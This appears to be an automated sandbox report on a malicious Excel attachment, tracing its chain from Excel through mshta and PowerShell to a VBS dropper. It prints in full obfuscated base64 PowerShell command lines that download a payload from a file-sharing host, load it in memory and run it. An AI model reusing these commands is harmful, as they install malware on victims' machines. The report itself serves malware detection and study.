Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.534757424.000000001C22D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.cr
Source: powershell.exe, 00000005.00000002.530318649.0000000003390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000005.00000002.533738321.0000000012001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000002.530318649.0000000001FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.660953442.0000000002462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.572052356.0000000002441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000E.00000002.572052356.0000000002642000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://3105.filemail.com
Source: powershell.exe, 0000000C.00000002.669105393.000000001A8FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3105.filemail.com/
Source: powershell.exe, 0000000C.00000002.669105393.000000001A8FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbC
Source: powershell.exe, 0000000E.00000002.571567594.0000000000278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_
Source: powershell.exe, 0000000E.00000002.572052356.0000000002642000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
Source: powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.505717437.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.501201143.0000000000377000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.506606458.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003820000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ljg.cl/
Source: mshta.exe, 00000004.00000002.506567896.00000000002CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.501201143.0000000000332000.00000004.00000020.00020000.00000000.sdmp, Shipping Document.xla.xlsx, 02B30000.0.dr	String found in binary or memory: https://ljg.cl/wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=n
Source: powershell.exe, 00000005.00000002.533738321.0000000012001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.530318649.00000000021DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

Source: unknown	HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49165 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2460, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: Shipping Document.xla.xlsx	OLE: Microsoft Excel 2007+
Source: 02B30000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall[1].hta

Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE89AB1E3D		5_2_000007FE89AB1E3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FE89AB00DD		5_2_000007FE89AB00DD

Source: Shipping Document.xla.xlsx

OLE indicator, VBA macros: true

Source: Shipping Document.xla.xlsx	Stream path 'MBD004A267C/\x1Ole' : https://ljg.cl/wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel_rR9S3.\|\|$' EQkV /uo+A1IwB--2b7V<1g=rxm#RZd\|Y$>Y8XePl2wv[`6RmnElZSG4913HMpY1ZrE764vcOaExsFL1UMfmCMkz1HFr8FoueZjrSC3pgJsbe3miGxzOfzykydsN2AjfLUe0xVscebC5SJjhMKoZu5Vkda78VokJpRBofsttFaN8NDm0sDpw9vePKnLZ30sr6CX8084SLUv4WMGPhakOtc7xLBuZhRYBmpv4TYtzMp2TcBsxORKKkhIcTpBWbAuyUWe737SF#}(Z~yp_?af
Source: 02B30000.0.dr	Stream path 'MBD004A267C/\x1Ole' : https://ljg.cl/wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel_rR9S3.\|\|$' EQkV /uo+A1IwB--2b7V<1g=rxm#RZd\|Y$>Y8XePl2wv[`6RmnElZSG4913HMpY1ZrE764vcOaExsFL1UMfmCMkz1HFr8FoueZjrSC3pgJsbe3miGxzOfzykydsN2AjfLUe0xVscebC5SJjhMKoZu5Vkda78VokJpRBofsttFaN8NDm0sDpw9vePKnLZ30sr6CX8084SLUv4WMGPhakOtc7xLBuZhRYBmpv4TYtzMp2TcBsxORKKkhIcTpBWbAuyUWe737SF#}(Z~yp_?af

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2018
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2458
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2018	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2458	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 2460, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.expl.evad.winXLSX@26/26@7/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Shipping Document.xla.xlsx

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR9B93.tmp

Jump to behavior

Source: Shipping Document.xla.xlsx	OLE indicator, Workbook stream: true
Source: 02B30000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............0.q.......q.....0gf...............D.....0gf.....8gf...............D......3D.....................0gf.............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(D.......................q.....}..w......q.......D.......D......1D.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..1..............P................q.......q.....}..w..............D.......D......1D.....(.P.......D......3D.......1.............0C..............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm.......................k.l....}..w....0C......\.F.......D.............(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..1.....................................0C......}..w.............$i.....Wh.l......h.....(.P.......................1.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm.......................k.l....}..w....0C......\.F.......D.............(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..1.....................................0C......}..w.............$i.....Wh.l......h.....(.P.......................1.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....h.......N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..$i.....Wh.l......h.....(.P.....................h....... .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .d.E.V.I.C.E.c.r.e.d.E.N.T.I.a.L.D.e.p.L.o.Y.M.E.n.T...E.X.e.................h.......@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.................h.......@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..1.....................................0C......}..w.............$i.....Wh.l......h.....(.P.......................1.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...h.......N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..1.....................................0C......}..w.............$i.....Wh.l......h.....(.P.......................1.....l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......0C......}..w.............$i.....Wh.l......h.....(.P.....................h...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...q.....}..w..............D.......D......1D.....(.P.......D......3D......................2..............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(D.......................q.....}..w......q.......D.......D......1D.....(.P.............p.......................................	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Shipping Document.xla.xlsx

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21r